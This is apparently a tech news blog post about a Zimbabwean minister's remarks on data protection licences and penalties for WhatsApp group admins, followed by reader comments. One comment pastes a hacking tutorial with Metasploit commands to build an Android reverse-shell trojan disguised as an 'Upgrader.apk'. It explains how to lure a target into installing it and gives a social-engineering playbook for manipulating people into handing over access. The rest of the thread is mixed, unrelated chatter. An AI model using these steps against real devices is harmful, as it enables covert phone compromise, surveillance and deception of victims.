There’s never a shortage of drama in Zimbabwe and the latest involves the Minister of ICT, Tatenda Mavetera. She said something that affects the all-important WhatsApp and tempers flared across the country.
This is an excerpt of the quote the got the country’s blood boiling:
The time is ticking for organisations that collect first party data, as you are required by law to have a data protection licence and the license fees range from $50 to $2500…
…Even churches who collect personal data ought to have such a licence and appoint a DPO. Whatsapp group admins are not spared too, if your groups are meant for business, you should as well obtain a licence. Failure to comply attracts penalties.
As you would imagine, Zimbabweans did not like this one bit and there was plenty of commentary on it. The Minister then came back with some clarification:
False claim of USD 2500 penalties for WhatsApp Group Administrators
I would like distance myself from the malicious fake news of intentions by government to licence or penalise WhatsApp Groups or Administrators of any social media platform/s USD 2500.
This claim is not applicable especially to players who do not collect and process Personally Identifiable Information (PII) for commercial or business use.
Personally identifiable information (PII) is any type of data that can be used to identify someone, from their name and address to their phone number, passport information and I.d number.
The public is encouraged to disregard this notice with the uttermost discontent it deserves as it is inconsistent with our legal provisions as espoused in Statutory Instrument (SI) 155 of the 2024 Cyber and Data Protection (Licencing of Data controllers and Appointment of Data Protection Officers) Regulations.
On my LinkedIn post I never expressed any intentions to licence or penalise WhatsApp groups or Administrators of any social media platform/s which do not collect and process (Personally Identifiable Information (PII) for commercial or business use…
Where are you getting $2500?
Let’s be fair on this. I will assume that there were people who misunderstood the original post and assumed it meant there would be $2500 fines for using WhatsApp groups without a data protection licence.
The original post and a reading of the relevant Statutory Instrument said data protection licence fees ranged from $50-2500. We went through how much you should expect to pay for your bussiness-focused WhatsApp group here.
That’s not to say the penalty for not having the licence is $2500. It’s clear that this is where the confusion came from. The $2500 is the licence fee for data controllers that collect data for over 500,000 people.
No WhatsApp group is that big. Instead, most WhatsApp groups (for business use) will pay $50 for a group of less than 1000 people.
However, this doesn’t mean there won’t be penalties. In fact, Individuals or entities that process personal information without a data controller licence may face a fine up to level 11 or imprisonment for up to seven years, or both.
Chapter 3(3) of the Statutory Instrument 155 of 2024 says:
Any person who processes personal information in terms of this section without a data controller licence within the stipulated time frames shall be guilty of an offence and liable to a fine not exceeding level 11 or to imprisonment for a period not exceeding seven years or to both such fine and such imprisonment.
It’s just $1000 and 7 years in jail
A level 11 fine is up to $1000. So, we’re talking possibly being fined $1000 and spending 7 years in jail for running a 50-member WhatsApp group.
Yes, that includes WhatsApp group admins for groups of over 50 people. That’s because phone numbers are considered personal information. The Minister rightly says Personally Identifiable Information includes phone numbers and that’s why WhatsApp groups will be affected.
So, when the Minister says she is distancing herself from the statement that people are being charged $2500, she can honestly say that.
However, she should have gone on to explain that it’s just $1000 and 7 years imprisonment. I don’t see how that’s any better than the $2500 fine she is distancing herself from.
The Minister says she never expressed any intentions to licence or penalise WhatsApp groups or Administrators of any social media platform/s which do not collect and process (Personally Identifiable Information (PII) for commercial or business use.
However, the law she is standing on says they can or rather should be penalised. I don’t think you will be able to protest in court that the Minister said she never expressed intentions to licence or penalise you.
If the law applies, you will have no recourse, regardless of what the Minister says. The law is clear, WhatsApp admins should be punished. So rather than distance herself from obvious mistakes in the commentary, she should grapple with the meat of the SI in question.
It’s ridiculous and she should say that and maybe help get the ball rolling on getting the law amended.
Anyway, that’s what I think of the whole fiasco. Do chime in if you have thoughts on this.
Personally, I think this law is overly harsh and unnecessary. As whatsApp group admins we shouldn’t face such severe penalties. We are quite aware that phone numbers are considered personal information. The Minister should reconsider this law and its implications on citizens’ freedom of expression and access to information.
I’m currently concerned with the imposed excessive penalties. Clearly $1000 and 7 years imprisonment is too much of a penalty for WhatsApp group admins. I mean, we just regular people doing regular business. This is restriction of freedom. I’m sure you can all attest that this law could potentially restrict citizens’ freedom of expression and access to information. It also affect small businesses and individuals like myself who are basically trying to earn a living.
I think it’s best if they reconsider the statutory instrument and its implications and engage citizens and stakeholders in discussions about data protection and privacy and also implement more reasonable penalties for data protection offenses.
When do IP addresses runout guys, we should be at 1Pv6 by now. Haven’t been tracking international tech news for a while, perhaps went global again.
The story is when the internet was created it was meant for military use. Sir Tom Berners Lee* then created HTML so ordinary people could use it.
The inherent flaw, not really a flaw but the thinking was not many devices would need it, then came the data explosion, then we started running out of IP addresses. The new ones look strange though but they won’t, fingers crossed run out, at least thats the thinking.
Regular IP: 5.185.145.139
IPv6: 5n.18a.bb8.3fd…or something like that, its confusing but necessary.
1) We have covered this here on Techzim.
2) We are not about to run out, we ran out.
3) Zimbabwe already uses IPv6. Liquid does although some ISPs just block it.
This will all be rendered moot when WhatsApp introduces user names. The solution in the mean time may be to switch groups over to telegram, since it already has usernames, and you can join a group without your number being known. It was a cute plan though.
For sale, Sparta, 7 Rooms plus kitchen and shower. $36,000 Neg.
5790 Unit J, Seke South, Chitungwiza
Come through, tinapangana.
Might I also add 7 years in a maximum security prison might not be that bad after all.I can only imagine the stories those inmates would share.Someof them were incarcerated but are innocent.The meals not for gratification but for sustinence.
The trading in cigarettes,the sculpting of chess pieces from sadza,the lack of vitamin D,the prison uniforms,the sketchy guards selling cellphones,the commissary,the snacks from visitors gold in the pen.
It’s really a different life in there and sampling it for 7 years might be too much but a year or two I’d survive.
I’ll follow you everywhere.
That law may not actually be waiting for ordinary groups but of a certain political party so as to tap into their conversations, get their numbers and names and addresses for easier access when the party wants to stage a rally, private meeting or demonstration. All other groups will not be affected.
Mark my post.
What’s happening to the world, here we have Vene and his crew, on the other side of the planet there is Trump and his crew, then there is Putin trying to convince everyone he’s still got game, while the Chinese quietly takeover of the world. It feels like silly season came back with a vengeance.
This is all unnecessary and unprofessional, what if you are just a teenager try to start a small business??. This will drive more citizens out of the country.
We have to deak with a gvt focused on censorship and micromanaging breadcrumbs. Any smart minister would have figured out how dumb the idea of managing whatsapp groups and taxing them is. Regardless of it being the law, it exposes the level of a person’s smarts and where some lights are dim or rarely turn on. Mavetera’s high-school kind of argument betrays her wits, if any she had. And it made me think under the present gvt which female minister has ever exhibited something plausible, that would have her set apart from the mediocrity that we are seeing today
Vineyard WhatsApp Group🍇
I have just seen an aeroplane going full throttle over Sparta ^, unmarked underbelly, heading South East.
I don’t know of many routes going South East, if it continues in that direction it will get to Maputo, not OR Tambo.
Air Zimbabwe, brace yourself! We need an expansion into regional routes linked to the African Free Trade Area, the closer ones first.
For planes I know you guys can come up with something even if they call them bhero oro lease or hire purchase.
I cannot get my head around that there is no direct flight to Maputo…
Maputo🇲🇿
Kinshasha🇨🇩
Lilongwe🇲🇼
Luanda🇦🇴
Lusaka🇿🇲
Air Zimbabwe Regional Jet 🚀🇿🇼
50 and 200 seaters mixed?
Embraer
Bombadier
…..? —-> +-14 years Local Variant.
Adapt and move on. If Whatapp does not fit your needs consider another platform that does meet your needs. Whatsapp with usernames????
Exploiting a Mobile Device Remotely
Kali Linux, a known toolkit for exploiting computers, is also one of the most efficient tools to perform a
hack on a mobile device. Follow these steps to perform a remote hack on a mobile device and install a
malicious file on a targeted device.
1. Pull up Kali Linux
Type the following command:
msfpayload android/meterpreter/reverse_tcp LHOST=[your device’s IP address] R >
/root/Upgrader.apk
2. Pull up a new terminal
While Kali is creating your file, load another terminal and load the metasploit console. To do that,
enter the command:
Msfconsole
3. Set up the listener
Once metasploit is up, load the multi-handler exploit by entering the command:
use exploit/multi/handler
Afterward, create the reverse payload by typing the following command:
set payload android/meterpreter/reverse_tcp
Next, you will need to set up the L host type in order for you to start receiving traffic. To do that,
type the following command:
set LHOST [Your device’s IP address]
4. Start the exploit
Now that you have your listener ready, you can now start your exploit by activating your listener.
To do this, type the command:
Exploit
If the malicious file or Trojan that you have created a while ago is ready, copy it from the root
folder to your mobile device, preferably an android phone. Afterwards, make that file available by
uploading it on any file-sharing site such as speedyshare or Dropbox. Send the link to your target,
and ask him to install the app.
Once your target user has installed the file, you can now receive the traffic that he is receiving
through his mobile device!
Social Engineering as Art and Science
The logic behind social engineering is simple – it can be easy to get all the information and access that one
needs from any person as long as you know how to trick a person into giving you the data you need with
the least resistance possible. By being able to pull off a social engineering trick, you will be able to get your
hands on to a device, account, or application that you need to access in order to perform bigger hacks or
hijack an identity altogether. That means that if you are capable of pulling of a social engineering tactic
before attempting to go through all other hijacking tactics up your sleeve, you do not need to make
additional effort to penetrate a system. To put this entire concept into simpler terms, social engineering is
a form of hacking that deals with manipulation of victims through social interaction, instead of having to
break right away into a computer system.
What makes social engineering difficult is that it is largely based on being able to secure trust, which is only
possible by getting someone’s trust. For this reason, the most successful hackers are capable of reading
possible responses from a person whenever they are triggered to perform any action in relation to their
security system. Once you are able to make the right predictions, you will be able to get passwords and
other valuable computer assets without having to use too many tools.
Since social engineering is mostly about psychology, you can consider this tactic as both an art and a
science. This tactic involves a great deal of creativity and ability to decipher nonverbal language of a device
or account owner. Social engineering experts are able to compile tactics that seem to work against
computer users all the time.
Together with other types of hacks available, you will realize that social engineering is that part of the most
successful attacks, and that attacks mostly work because of some form of mental trickery performed by a
hacker. Social engineering makes it possible for a person to simply log in personal information on any form
he sees, or freely open an attachment that has embedded malware.
Because social engineering’s goal is to dupe someone into providing information that will allow access to a
more valuable data, this hacking tactic will allow you to get mostly anything from a targeted system. What
makes it a good tactic is that you can phish for a gateway to the information that you want to hack from
mostly anyone that has access to the system that you are targeting, from receptionists to IT personnel,
with these steps:
1. Research
2. Creation of trust
3. Exploitation of relationship by communicating with targeted individual
4. Using information leaked for malicious gain
The art and science behind social engineering are created because of a single truth about information
security – security ends and begins with a user’s knowledge on how a system should be protected. No
matter how updated your security system is, you will never be able to protect your network and your devices if there is a user on your end that is not capable of keeping vital information from potential
attackers. With this thought comes the idea that once a social engineer becomes more aware of who
should be targeted within the organization for critical information.
Hannibal from Tunisia went to war with Elephants, Bees, Snakes and a mixed race army, very unconventional at the time, but he was effective until the last moment, not sure what happened but he left Rome unsacked. Off course he was to pay for this, there is a video game about this, Rome Total War. I played the previous Total War version, Napoleon. Immerse game, very tactical.
One of my versions of artillery fire. Mamba cocktail, large clay pot, live black mambas on an air cushion of something to break the fall. Then you write a little note inside. Then your hurl 100 pissed Black Mambas into an enemy camp at night. Crash, the clay pot breaks! Ma1 atanga, just listen to the pandemonium, take a video for posterity.
The minister should not be the one ahead of this, it should be Potraz. They are the ones dealing with implementation, monitoring and compliance. According to them they will not be focusing on social media. It has been asked and they said so. Now it looks like they are keeping quiet to save face for the minister who keeps talking out the side of her neck. She spoke on a issue she was not well versed with. Instead of making high level comment she went into specifics which I doubt she knows much about and it shows.